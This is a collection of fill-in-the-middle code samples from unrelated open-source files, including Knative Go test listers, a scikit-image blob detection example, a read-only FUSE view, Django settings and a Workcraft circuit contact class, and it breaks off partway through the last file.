ValidatorKey(new DataType(key.getType().getModel()))); } return answer; } @Override public boolean isStatic(DataType type) { return isStatic(new ValidatorKey(type)); } <|fim▁hole|> @Override public String toString() { return "ValidatorRegistry for " + context.getName() + " [capacity: " + maxCacheSize + "]"; } @Override public Validator put(ValidatorKey key, Validator obj) { // ensure validator is started before its being used ServiceHelper.startService(obj); return super.put(key, obj); } }<|fim▁end|>
@Override public boolean isDynamic(DataType type) { return isDynamic(new ValidatorKey(type)); }
<|file_name|>listers.go<|end_file_name|><|fim▁begin|>/* Copyright 2018 The Knative Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package testing import ( appsv1 "k8s.io/api/apps/v1" corev1 "k8s.io/api/core/v1" rbacv1 "k8s.io/api/rbac/v1" apiextensionsv1 "k8s.io/apiextensions-apiserver/pkg/apis/apiextensions/v1" fakeapiextensionsclientset "k8s.io/apiextensions-apiserver/pkg/client/clientset/clientset/fake" apiextensionsv1listers "k8s.io/apiextensions-apiserver/pkg/client/listers/apiextensions/v1" "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" "k8s.io/apimachinery/pkg/runtime" "k8s.io/apimachinery/pkg/runtime/schema" fakekubeclientset "k8s.io/client-go/kubernetes/fake" appsv1listers "k8s.io/client-go/listers/apps/v1" corev1listers "k8s.io/client-go/listers/core/v1" rbacv1listers "k8s.io/client-go/listers/rbac/v1" "k8s.io/client-go/tools/cache" sourcesv1beta2 "knative.dev/eventing/pkg/apis/sources/v1beta2" fakeeventingclientset "knative.dev/eventing/pkg/client/clientset/versioned/fake" sourcev1beta2listers "knative.dev/eventing/pkg/client/listers/sources/v1beta2" duckv1 "knative.dev/pkg/apis/duck/v1" "knative.dev/pkg/reconciler/testing" ) var subscriberAddToScheme = func(scheme *runtime.Scheme) error { scheme.AddKnownTypeWithName(schema.GroupVersionKind{Group: "testing.eventing.knative.dev", Version: "v1", Kind: "Subscriber"}, &unstructured.Unstructured{}) return nil } var sourceAddToScheme = func(scheme *runtime.Scheme) error { scheme.AddKnownTypeWithName(schema.GroupVersionKind{Group: "testing.sources.knative.dev", Version: "v1", Kind: "TestSource"}, &duckv1.Source{}) return nil } var clientSetSchemes = []func(*runtime.Scheme) error{ fakekubeclientset.AddToScheme, fakeeventingclientset.AddToScheme, fakeapiextensionsclientset.AddToScheme, subscriberAddToScheme, sourceAddToScheme, } type Listers struct { sorter testing.ObjectSorter } func NewScheme() *runtime.Scheme { scheme := runtime.NewScheme() for _, addTo := range clientSetSchemes { addTo(scheme) } return scheme } func NewListers(objs []runtime.Object) Listers { scheme := runtime.NewScheme() for _, addTo := range clientSetSchemes { addTo(scheme) } ls := Listers{ sorter: testing.NewObjectSorter(scheme), } ls.sorter.AddObjects(objs...) return ls } func (l *Listers) indexerFor(obj runtime.Object) cache.Indexer { return l.sorter.IndexerForObjectType(obj) } func (l *Listers) GetKubeObjects() []runtime.Object { return l.sorter.ObjectsForSchemeFunc(fakekubeclientset.AddToScheme) } func (l *Listers) GetEventingObjects() []runtime.Object { return l.sorter.ObjectsForSchemeFunc(fakeeventingclientset.AddToScheme) } func (l *Listers) GetAPIExtentionsObjects() []runtime.Object { return l.sorter.ObjectsForSchemeFunc(fakeapiextensionsclientset.AddToScheme) } func (l *Listers) GetSubscriberObjects() []runtime.Object { return l.sorter.ObjectsForSchemeFunc(subscriberAddToScheme) } func (l *Listers) GetAllObjects() []runtime.Object { all := l.GetSubscriberObjects() all = append(all, l.GetEventingObjects()...) all = append(all, l.GetKubeObjects()...) return all } func (l *Listers) GetPingSourceV1beta2Lister() sourcev1beta2listers.PingSourceLister { return sourcev1beta2listers.NewPingSourceLister(l.indexerFor(&sourcesv1beta2.PingSource{})) } func (l *Listers) GetDeploymentLister() appsv1listers.DeploymentLister { return appsv1listers.NewDeploymentLister(l.indexerFor(&appsv1.Deployment{})) } func (l *Listers) GetK8sServiceLister() corev1listers.ServiceLister { return corev1listers.NewServiceLister(l.indexerFor(&corev1.Service{})) } func (l *Listers) GetSecretLister() corev1listers.SecretLister { return corev1listers.NewSecretLister(l.indexerFor(&corev1.Secret{})) } func (l *Listers) GetNamespaceLister() corev1listers.NamespaceLister { return corev1listers.NewNamespaceLister(l.indexerFor(&corev1.Namespace{})) } func (l *Listers) GetServiceAccountLister() corev1listers.ServiceAccountLister { return corev1listers.NewServiceAccountLister(l.indexerFor(&corev1.ServiceAccount{})) } func (l *Listers) GetServiceLister() corev1listers.ServiceLister {<|fim▁hole|> return corev1listers.NewServiceLister(l.indexerFor(&corev1.Service{})) } func (l *Listers) GetRoleBindingLister() rbacv1listers.RoleBindingLister { return rbacv1listers.NewRoleBindingLister(l.indexerFor(&rbacv1.RoleBinding{})) } func (l *Listers) GetEndpointsLister() corev1listers.EndpointsLister { return corev1listers.NewEndpointsLister(l.indexerFor(&corev1.Endpoints{})) } func (l *Listers) GetConfigMapLister() corev1listers.ConfigMapLister { return corev1listers.NewConfigMapLister(l.indexerFor(&corev1.ConfigMap{})) } func (l *Listers) GetCustomResourceDefinitionLister() apiextensionsv1listers.CustomResourceDefinitionLister { return apiextensionsv1listers.NewCustomResourceDefinitionLister(l.indexerFor(&apiextensionsv1.CustomResourceDefinition{})) }<|fim▁end|>
<|file_name|>plot_blob.py<|end_file_name|><|fim▁begin|>""" ============== Blob Detection ============== Blobs are bright on dark or dark on bright regions in an image. In this example, blobs are detected using 3 algorithms. The image used in this case is the Hubble eXtreme Deep Field. Each bright dot in the image is a star or a galaxy. Laplacian of Gaussian (LoG) ----------------------------- This is the most accurate and slowest approach. It computes the Laplacian of Gaussian images with successively increasing standard deviation and stacks them up in a cube. Blobs are local maximas in this cube. Detecting larger blobs is especially slower because of larger kernel sizes during convolution. Only bright blobs on dark backgrounds are detected. See :py:meth:`skimage.feature.blob_log` for usage. Difference of Gaussian (DoG) ---------------------------- This is a faster approximation of LoG approach. In this case the image is blurred with increasing standard deviations and the difference between two successively blurred images are stacked up in a cube. This method suffers from the same disadvantage as LoG approach for detecting larger blobs. Blobs are again assumed to be bright on dark. See :py:meth:`skimage.feature.blob_dog` for usage. Determinant of Hessian (DoH) ---------------------------- This is the fastest approach. It detects blobs by finding maximas in the matrix of the Determinant of Hessian of the image. The detection speed is independent of the size of blobs as internally the implementation uses box filters instead of convolutions. Bright on dark as well as dark on bright blobs are detected. The downside is that small blobs (<3px) are not detected accurately. See :py:meth:`skimage.feature.blob_doh` for usage. """ from math import sqrt from skimage import data from skimage.feature import blob_dog, blob_log, blob_doh from skimage.color import rgb2gray import matplotlib.pyplot as plt image = data.hubble_deep_field()[0:500, 0:500] image_gray = rgb2gray(image) blobs_log = blob_log(image_gray, max_sigma=30, num_sigma=10, threshold=.1) # Compute radii in the 3rd column. blobs_log[:, 2] = blobs_log[:, 2] * sqrt(2) blobs_dog = blob_dog(image_gray, max_sigma=30, threshold=.1) blobs_dog[:, 2] = blobs_dog[:, 2] * sqrt(2) blobs_doh = blob_doh(image_gray, max_sigma=30, threshold=.01)<|fim▁hole|> 'Determinant of Hessian'] sequence = zip(blobs_list, colors, titles) fig, axes = plt.subplots(1, 3, figsize=(9, 3), sharex=True, sharey=True, subplot_kw={'adjustable': 'box-forced'}) ax = axes.ravel() for idx, (blobs, color, title) in enumerate(sequence): ax[idx].set_title(title) ax[idx].imshow(image, interpolation='nearest') for blob in blobs: y, x, r = blob c = plt.Circle((x, y), r, color=color, linewidth=2, fill=False) ax[idx].add_patch(c) ax[idx].set_axis_off() plt.tight_layout() plt.show()<|fim▁end|>
blobs_list = [blobs_log, blobs_dog, blobs_doh] colors = ['yellow', 'lime', 'red'] titles = ['Laplacian of Gaussian', 'Difference of Gaussian',
<|file_name|>load_more.py<|end_file_name|><|fim▁begin|>def action_comment_load_more(context, action, entity_type, entity_id, last_id, parent_id, **args): try: entity = IN.entitier.load_single(entity_type, int(entity_id)) if not entity: return output = Object() db = IN.db connection = db.connection container_id = IN.commenter.get_container_id(entity) # TODO: paging # get total total = 0 limit = 10 cursor = db.select({ 'table' : 'entity.comment', 'columns' : ['count(id)'], 'where' : [ ['container_id', container_id], ['id', '<', int(last_id)], # load previous ['parent_id', parent_id], ['status', 1], ], }).execute() if cursor.rowcount >= 0: total = int(cursor.fetchone()[0]) more_id = '_'.join(('more-commens', entity_type, str(entity_id), str(parent_id))) if total > 0: cursor = db.select({ 'table' : 'entity.comment', 'columns' : ['id'], 'where' : [ ['container_id', container_id], ['id', '<', int(last_id)], ['parent_id', parent_id], # add main level comments only ['status', 1], ], 'order' : {'created' : 'DESC'}, 'limit' : limit, }).execute() ids = [] last_id = 0 if cursor.rowcount >= 0: for row in cursor: ids.append(row['id']) last_id = ids[-1] # last id comments = IN.entitier.load_multiple('Comment', ids) for id, comment in comments.items(): comment.weight = id # keep asc order output.add(comment) remaining = total - limit if remaining > 0 and last_id > 0: output.add('TextDiv', { 'id' : more_id, 'value' : str(remaining) + ' more comments', 'css' : ['ajax i-text-center i-text-danger pointer'], 'attributes' : { 'data-href' : ''.join(('/comment/more/!Content/', str(entity_id), '/', str(last_id), '/', str(parent_id))) }, 'weight' : -1, }) #if not output:<|fim▁hole|> #output.add(type = 'TextDiv', data = {}) output = {more_id : output} context.response = In.core.response.PartialResponse(output = output) except: IN.logger.debug()<|fim▁end|>
<|file_name|>read_only.py<|end_file_name|><|fim▁begin|># Copyright 2014 PressLabs SRL # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from errno import EROFS from fuse import FuseOSError, ENOTSUP from .view import View class ReadOnlyView(View): def getxattr(self, path, name, *args): raise FuseOSError(ENOTSUP) def open(self, path, flags): write_flags = (os.O_WRONLY | os.O_RDWR | os.O_APPEND | os.O_TRUNC | os.O_CREAT) if write_flags & flags: raise FuseOSError(EROFS) return 0 def create(self, path, fh): raise FuseOSError(EROFS) def write(self, path, fh): raise FuseOSError(EROFS)<|fim▁hole|> def opendir(self, path): return 0 def releasedir(self, path, fi): return 0 def flush(self, path, fh): return 0 def release(self, path, fh): return 0 def access(self, path, amode): if amode & os.W_OK: raise FuseOSError(EROFS) return 0 def mkdir(self, path, mode): raise FuseOSError(EROFS) def utimens(self, path, times=None): raise FuseOSError(EROFS) def chown(self, path, uid, gid): raise FuseOSError(EROFS) def chmod(self, path, mode): raise FuseOSError(EROFS)<|fim▁end|>
<|file_name|>models.py<|end_file_name|><|fim▁begin|><|fim▁hole|><|fim▁end|>
"""Must be kept even empty. That makes a Django app."""
<|file_name|>ex13.py<|end_file_name|><|fim▁begin|>#### #Importing modules can serve 3 purposes if done right #1-Allows you to add features to bare bones python #2-Only importing what you need lets your imports serve as documentation for # someone else reading your code later. #3-By forcing you to import things, python helps you keep your programs small #### #import the 'hook' which lets python read command line arguments from sys import argv #argv is a list. This line puts all the elements into variables script, first, second, third, fourth = argv #You understand printing by now print "Your script is called ", script, ", which was the zeroth variable." print "Your first variable was ", first print "Your second variable was ", second<|fim▁hole|><|fim▁end|>
print "Your third variable was ", third print "Your first variable was ", first
<|file_name|>SqlDataType.java<|end_file_name|><|fim▁begin|>/* Copyright 2018 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package com.google.swarm.sqlserver.migration.common; import java.util.HashMap;<|fim▁hole|> VARCHAR(0), NVARCHAR(1), CHAR(2), NCHAR(3), TEXT(4), NTEXT(5), BIGINT(6), INT(7), TINYINT(8), SMALLINT(9), NUMERIC(10), DECIMAL(11), MONEY(12), SMALLMONEY(13), FLOAT(14), REAL(15), BIT(16), DATE(17), TIME(18), DATETIME(19), DATETIME2(20), DATETIMEOFFSET(21), SMALLDATETIME(22), BINARY(23), IMAGE(24), VARBINARY(25), UNIQUEIDENTIFIER(26), TIMESTAMP(27); private int codeValue; private static HashMap<Integer, SqlDataType> codeValueMap = new HashMap<Integer, SqlDataType>(); private SqlDataType(int codeValue) { this.codeValue = codeValue; } static { for (SqlDataType type : SqlDataType.values()) { codeValueMap.put(type.codeValue, type); } } public static SqlDataType getInstanceFromCodeValue(int codeValue) { return codeValueMap.get(codeValue); } public int getCodeValue() { return codeValue; } }<|fim▁end|>
public enum SqlDataType {
<|file_name|>user_config.py<|end_file_name|><|fim▁begin|>from cobra.core.loading import get_model from cobra.core import json class UserConfig(object): default_config = { 'guide.task.participant': '1',<|fim▁hole|> 'order.task.search': 'default', 'order.task.searchDirection': 'DESC', 'portal.workdyna': 'subordinates-task', 'system.menu.display':'', 'viewState.task': 'list', 'guide.biaoge.showintro': '1', 'workreport.push.set': '1', 'agenda.push.set': '1' } def __init__(self, user): self.__user_config = self.__build_user_config(user) def __build_user_config(self, user): UserOption = get_model('option', 'UserOption') u_c = {} for k, v in self.default_config.items(): u_c[k] = UserOption.objects.get_value(user, None, k, v) return u_c def to_python(self): configs = [] for k, v in self.__user_config.items(): m = { 'configKey': k, 'configValue': v } configs.append(m) return configs def to_json(self): return json.dumps(self.to_python())<|fim▁end|>
'guide.document.share': '1', 'guide.customer.share': '1', 'guide.workflow.operation': '1', 'guide.workflow.createform': '1',
<|file_name|>nontransitive_dice.py<|end_file_name|><|fim▁begin|># Copyright 2010 Hakan Kjellerstrand [email protected] # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Nontransitive dice in Google CP Solver. From http://en.wikipedia.org/wiki/Nontransitive_dice ''' A set of nontransitive dice is a set of dice for which the relation 'is more likely to roll a higher number' is not transitive. See also intransitivity. This situation is similar to that in the game Rock, Paper, Scissors, in which each element has an advantage over one choice and a disadvantage to the other. ''' I start with the 3 dice version ''' * die A has sides {2,2,4,4,9,9}, * die B has sides {1,1,6,6,8,8}, and * die C has sides {3,3,5,5,7,7}. ''' 3 dice: Maximum winning: 27 comp: [19, 27, 19] dice: [[0, 0, 3, 6, 6, 6], [2, 5, 5, 5, 5, 5], [1, 1, 4, 4, 4, 7]] max_win: 27 Number of solutions: 1 Nodes: 1649873 Time: 25.94 getFailures: 1649853 getBacktracks: 1649873 getPropags: 98105090 Max winnings where they are the same: 21 comp: [21, 21, 21] dice: [[0, 0, 3, 3, 3, 6], [2, 2, 2, 2, 2, 5], [1, 1, 1, 4, 4, 4]] max_win: 21 Compare with these models: * MiniZinc: http://hakank.org/minizinc/nontransitive_dice.mzn * Comet: http://hakank.org/comet/nontransitive_dice.co This model was created by Hakan Kjellerstrand ([email protected]) Also see my other Google CP Solver models: http://www.hakank.org/google_or_tools/ """ import sys import string from ortools.constraint_solver import pywrapcp def main(m=3, n=6, minimize_val=0): # Create the solver. solver = pywrapcp.Solver("Nontransitive dice") # # data # print "number of dice:", m print "number of sides:", n # # declare variables # dice = {} for i in range(m): for j in range(n): dice[(i, j)] = solver.IntVar(1, n * 2, "dice(%i,%i)" % (i, j)) dice_flat = [dice[(i, j)] for i in range(m) for j in range(n)] comp = {} for i in range(m): for j in range(2): comp[(i, j)] = solver.IntVar(0, n * n, "comp(%i,%i)" % (i, j)) comp_flat = [comp[(i, j)] for i in range(m) for j in range(2)] # The following variables are for summaries or objectives gap = [solver.IntVar(0, n * n, "gap(%i)" % i) for i in range(m)]<|fim▁hole|> max_val = solver.IntVar(0, n * 2, "max_val") max_win = solver.IntVar(0, n * n, "max_win") # number of occurrences of each value of the dice counts = [solver.IntVar(0, n * m, "counts(%i)" % i) for i in range(n * 2 + 1)] # # constraints # # number of occurrences for each number solver.Add(solver.Distribute(dice_flat, range(n * 2 + 1), counts)) solver.Add(max_win == solver.Max(comp_flat)) solver.Add(max_val == solver.Max(dice_flat)) # order of the number of each die, lowest first [solver.Add(dice[(i, j)] <= dice[(i, j + 1)]) for i in range(m) for j in range(n - 1)] # nontransitivity [comp[i, 0] > comp[i, 1] for i in range(m)], # probability gap [solver.Add(gap[i] == comp[i, 0] - comp[i, 1]) for i in range(m)] [solver.Add(gap[i] > 0) for i in range(m)] solver.Add(gap_sum == solver.Sum(gap)) # and now we roll... # Number of wins for [A vs B, B vs A] for d in range(m): b1 = [solver.IsGreaterVar(dice[d % m, r1], dice[(d + 1) % m, r2]) for r1 in range(n) for r2 in range(n)] solver.Add(comp[d % m, 0] == solver.Sum(b1)) b2 = [solver.IsGreaterVar(dice[(d + 1) % m, r1], dice[d % m, r2]) for r1 in range(n) for r2 in range(n)] solver.Add(comp[d % m, 1] == solver.Sum(b2)) # objective if minimize_val != 0: print "Minimizing max_val" objective = solver.Minimize(max_val, 1) # other experiments # objective = solver.Maximize(max_win, 1) # objective = solver.Maximize(gap_sum, 1) # # solution and search # db = solver.Phase(dice_flat + comp_flat, solver.INT_VAR_DEFAULT, solver.ASSIGN_MIN_VALUE) if minimize_val: solver.NewSearch(db, [objective]) else: solver.NewSearch(db) num_solutions = 0 while solver.NextSolution(): print "gap_sum:", gap_sum.Value() print "gap:", [gap[i].Value() for i in range(m)] print "max_val:", max_val.Value() print "max_win:", max_win.Value() print "dice:" for i in range(m): for j in range(n): print dice[(i, j)].Value(), print print "comp:" for i in range(m): for j in range(2): print comp[(i, j)].Value(), print print "counts:", [counts[i].Value() for i in range(n * 2 + 1)] print num_solutions += 1 solver.EndSearch() print print "num_solutions:", num_solutions print "failures:", solver.Failures() print "branches:", solver.Branches() print "WallTime:", solver.WallTime() m = 3 # number of dice n = 6 # number of sides of each die minimize_val = 0 # Minimizing max value (0: no, 1: yes) if __name__ == "__main__": if len(sys.argv) > 1: m = string.atoi(sys.argv[1]) if len(sys.argv) > 2: n = string.atoi(sys.argv[2]) if len(sys.argv) > 3: minimize_val = string.atoi(sys.argv[3]) main(m, n, minimize_val)<|fim▁end|>
gap_sum = solver.IntVar(0, m * n * n, "gap_sum")
<|file_name|>base.py<|end_file_name|><|fim▁begin|>import os from unipath import Path from django.core.exceptions import ImproperlyConfigured import dj_database_url def env_var(var_name): """Get the environment variable var_name or return an exception.""" try: return os.environ[var_name] except KeyError: msg = "Please set the environment variable {}".format(var_name) raise ImproperlyConfigured(msg) SECRET_KEY = env_var("MT_SECRET_KEY") ALLOWED_HOSTS = ['localhost', '127.0.0.1'] # ADMIN_PATH controls where the admin urls are. # e.g. if ADMIN_PATH == 'adminsitemilktea', then the admin site # should be available at /adminsitemilktea/ instead of /admin/. ADMIN_PATH = env_var("MT_ADMIN_PATH") DJANGO_CORE_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] THIRD_PARTY_APPS = [ 'djmoney', 'nested_admin', ] CUSTOM_APPS = [ 'core', ] INSTALLED_APPS = DJANGO_CORE_APPS + THIRD_PARTY_APPS + CUSTOM_APPS MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'mt.urls' WSGI_APPLICATION = 'mt.wsgi.application' BASE_DIR = Path(__file__).ancestor(3) MEDIA_ROOT = BASE_DIR.child("media") STATIC_ROOT = BASE_DIR.child("static") STATICFILES_DIRS = ( BASE_DIR.child("assets"), ) TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': (BASE_DIR.child("templates"),), 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] DATABASES = {'default': dj_database_url.parse(env_var("MT_MYSQL_URL"), conn_max_age = 600)}<|fim▁hole|>AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] TIME_ZONE = 'America/Los_Angeles' LANGUAGE_CODE = 'en-us' USE_I18N = False USE_L10N = True USE_TZ = True STATIC_URL = '/static/'<|fim▁end|>
DATABASES['default']['ATOMIC_REQUESTS'] = True
<|file_name|>VisualFunctionContact.java<|end_file_name|><|fim▁begin|>package org.workcraft.plugins.circuit; import org.workcraft.annotations.DisplayName; import org.workcraft.annotations.Hotkey; import org.workcraft.annotations.SVGIcon; import org.workcraft.dom.Node; import org.workcraft.dom.visual.BoundingBoxHelper; import org.workcraft.dom.visual.DrawRequest; import org.workcraft.formula.BooleanFormula; import org.workcraft.formula.visitors.FormulaRenderingResult; import org.workcraft.formula.visitors.FormulaToGraphics; import org.workcraft.gui.tools.Decoration; import org.workcraft.observation.PropertyChangedEvent; import org.workcraft.observation.StateEvent; import org.workcraft.observation.StateObserver; import org.workcraft.plugins.circuit.renderers.ComponentRenderingResult.RenderType; import org.workcraft.serialisation.NoAutoSerialisation; import org.workcraft.utils.ColorUtils; import org.workcraft.utils.Hierarchy; import java.awt.*; import java.awt.event.KeyEvent; import java.awt.font.FontRenderContext; import java.awt.geom.*; import java.io.IOException; import java.util.Collection; import java.util.HashSet;<|fim▁hole|>@Hotkey(KeyEvent.VK_P) @SVGIcon("images/circuit-node-port.svg") public class VisualFunctionContact extends VisualContact implements StateObserver { private static final double size = 0.3; private static FontRenderContext context = new FontRenderContext(AffineTransform.getScaleInstance(1000.0, 1000.0), true, true); private static Font functionFont; private FormulaRenderingResult renderedSetFunction = null; private FormulaRenderingResult renderedResetFunction = null; private static double functionFontSize = CircuitSettings.getFunctionFontSize(); static { try { functionFont = Font.createFont(Font.TYPE1_FONT, ClassLoader.getSystemResourceAsStream("fonts/eurm10.pfb")); } catch (FontFormatException | IOException e) { e.printStackTrace(); } } public VisualFunctionContact(FunctionContact contact) { super(contact); } @Override public FunctionContact getReferencedComponent() { return (FunctionContact) super.getReferencedComponent(); } @NoAutoSerialisation public BooleanFormula getSetFunction() { return getReferencedComponent().getSetFunction(); } @NoAutoSerialisation public void setSetFunction(BooleanFormula setFunction) { if (getParent() instanceof VisualFunctionComponent) { VisualFunctionComponent p = (VisualFunctionComponent) getParent(); p.invalidateRenderingResult(); } renderedSetFunction = null; getReferencedComponent().setSetFunction(setFunction); } @NoAutoSerialisation public BooleanFormula getResetFunction() { return getReferencedComponent().getResetFunction(); } @NoAutoSerialisation public void setForcedInit(boolean value) { getReferencedComponent().setForcedInit(value); } @NoAutoSerialisation public boolean getForcedInit() { return getReferencedComponent().getForcedInit(); } @NoAutoSerialisation public void setInitToOne(boolean value) { getReferencedComponent().setInitToOne(value); } @NoAutoSerialisation public boolean getInitToOne() { return getReferencedComponent().getInitToOne(); } @NoAutoSerialisation public void setResetFunction(BooleanFormula resetFunction) { if (getParent() instanceof VisualFunctionComponent) { VisualFunctionComponent p = (VisualFunctionComponent) getParent(); p.invalidateRenderingResult(); } renderedResetFunction = null; getReferencedComponent().setResetFunction(resetFunction); } public void invalidateRenderedFormula() { renderedSetFunction = null; renderedResetFunction = null; } private Font getFunctionFont() { return functionFont.deriveFont((float) CircuitSettings.getFunctionFontSize()); } private FormulaRenderingResult getRenderedSetFunction() { if (Math.abs(CircuitSettings.getFunctionFontSize() - functionFontSize) > 0.001) { functionFontSize = CircuitSettings.getContactFontSize(); renderedSetFunction = null; } BooleanFormula setFunction = getReferencedComponent().getSetFunction(); if (setFunction == null) { renderedSetFunction = null; } else if (renderedSetFunction == null) { renderedSetFunction = FormulaToGraphics.render(setFunction, context, getFunctionFont()); } return renderedSetFunction; } private Point2D getSetFormulaOffset() { double xOffset = size; double yOffset = -size / 2; FormulaRenderingResult renderingResult = getRenderedSetFunction(); if (renderingResult != null) { Direction dir = getDirection(); if (!(getParent() instanceof VisualFunctionComponent)) { dir = dir.flip(); } if ((dir == Direction.SOUTH) || (dir == Direction.WEST)) { xOffset = -(size + renderingResult.boundingBox.getWidth()); } } return new Point2D.Double(xOffset, yOffset); } private Rectangle2D getSetBoundingBox() { Rectangle2D bb = null; FormulaRenderingResult setRenderingResult = getRenderedSetFunction(); if (setRenderingResult != null) { bb = BoundingBoxHelper.move(setRenderingResult.boundingBox, getSetFormulaOffset()); Direction dir = getDirection(); if (!(getParent() instanceof VisualFunctionComponent)) { dir = dir.flip(); } if ((dir == Direction.NORTH) || (dir == Direction.SOUTH)) { AffineTransform rotateTransform = new AffineTransform(); rotateTransform.quadrantRotate(-1); bb = BoundingBoxHelper.transform(bb, rotateTransform); } } return bb; } private FormulaRenderingResult getRenderedResetFunction() { if (Math.abs(CircuitSettings.getFunctionFontSize() - functionFontSize) > 0.001) { functionFontSize = CircuitSettings.getContactFontSize(); renderedResetFunction = null; } BooleanFormula resetFunction = getReferencedComponent().getResetFunction(); if (resetFunction == null) { renderedResetFunction = null; } else if (renderedResetFunction == null) { renderedResetFunction = FormulaToGraphics.render(resetFunction, context, getFunctionFont()); } return renderedResetFunction; } private Point2D getResetFormulaOffset() { double xOffset = size; double yOffset = size / 2; FormulaRenderingResult renderingResult = getRenderedResetFunction(); if (renderingResult != null) { Direction dir = getDirection(); if (!(getParent() instanceof VisualFunctionComponent)) { dir = dir.flip(); } if ((dir == Direction.SOUTH) || (dir == Direction.WEST)) { xOffset = -(size + renderingResult.boundingBox.getWidth()); } yOffset = size / 2 + renderingResult.boundingBox.getHeight(); } return new Point2D.Double(xOffset, yOffset); } private Rectangle2D getResetBoundingBox() { Rectangle2D bb = null; FormulaRenderingResult renderingResult = getRenderedResetFunction(); if (renderingResult != null) { bb = BoundingBoxHelper.move(renderingResult.boundingBox, getResetFormulaOffset()); Direction dir = getDirection(); if (!(getParent() instanceof VisualFunctionComponent)) { dir = dir.flip(); } if ((dir == Direction.NORTH) || (dir == Direction.SOUTH)) { AffineTransform rotateTransform = new AffineTransform(); rotateTransform.quadrantRotate(-1); bb = BoundingBoxHelper.transform(bb, rotateTransform); } } return bb; } private void drawArrow(Graphics2D g, int arrowType, double arrX, double arrY) { double s = CircuitSettings.getFunctionFontSize(); g.setStroke(new BasicStroke((float) s / 25)); double s1 = 0.75 * s; double s2 = 0.45 * s; double s3 = 0.30 * s; if (arrowType == 1) { // arrow down Line2D line = new Line2D.Double(arrX, arrY - s1, arrX, arrY - s3); Path2D path = new Path2D.Double(); path.moveTo(arrX - 0.05, arrY - s3); path.lineTo(arrX + 0.05, arrY - s3); path.lineTo(arrX, arrY); path.closePath(); g.fill(path); g.draw(line); } else if (arrowType == 2) { // arrow up Line2D line = new Line2D.Double(arrX, arrY, arrX, arrY - s2); Path2D path = new Path2D.Double(); path.moveTo(arrX - 0.05, arrY - s2); path.lineTo(arrX + 0.05, arrY - s2); path.lineTo(arrX, arrY - s1); path.closePath(); g.fill(path); g.draw(line); } } private void drawFormula(Graphics2D g, int arrowType, Point2D offset, FormulaRenderingResult renderingResult) { if (renderingResult != null) { Direction dir = getDirection(); if (!(getParent() instanceof VisualFunctionComponent)) { dir = dir.flip(); } AffineTransform savedTransform = g.getTransform(); if ((dir == Direction.NORTH) || (dir == Direction.SOUTH)) { AffineTransform rotateTransform = new AffineTransform(); rotateTransform.quadrantRotate(-1); g.transform(rotateTransform); } double dXArrow = -0.15; if ((dir == Direction.SOUTH) || (dir == Direction.WEST)) { dXArrow = renderingResult.boundingBox.getWidth() + 0.15; } drawArrow(g, arrowType, offset.getX() + dXArrow, offset.getY()); g.translate(offset.getX(), offset.getY()); renderingResult.draw(g); g.setTransform(savedTransform); } } @Override public void draw(DrawRequest r) { if (needsFormulas()) { Graphics2D g = r.getGraphics(); Decoration d = r.getDecoration(); g.setColor(ColorUtils.colorise(getForegroundColor(), d.getColorisation())); FormulaRenderingResult renderingResult; renderingResult = getRenderedSetFunction(); if (renderingResult != null) { Point2D offset = getSetFormulaOffset(); drawFormula(g, 2, offset, renderingResult); } renderingResult = getRenderedResetFunction(); if (renderingResult != null) { Point2D offset = getResetFormulaOffset(); drawFormula(g, 1, offset, renderingResult); } } super.draw(r); } private boolean needsFormulas() { boolean result = false; Node parent = getParent(); if (parent != null) { // Primary input port if (!(parent instanceof VisualCircuitComponent) && isInput()) { result = true; } // Output port of a BOX-rendered component if ((parent instanceof VisualFunctionComponent) && isOutput()) { VisualFunctionComponent component = (VisualFunctionComponent) parent; if (component.getRenderType() == RenderType.BOX) { result = true; } } } return result; } @Override public Rectangle2D getBoundingBoxInLocalSpace() { Rectangle2D bb = super.getBoundingBoxInLocalSpace(); if (needsFormulas()) { bb = 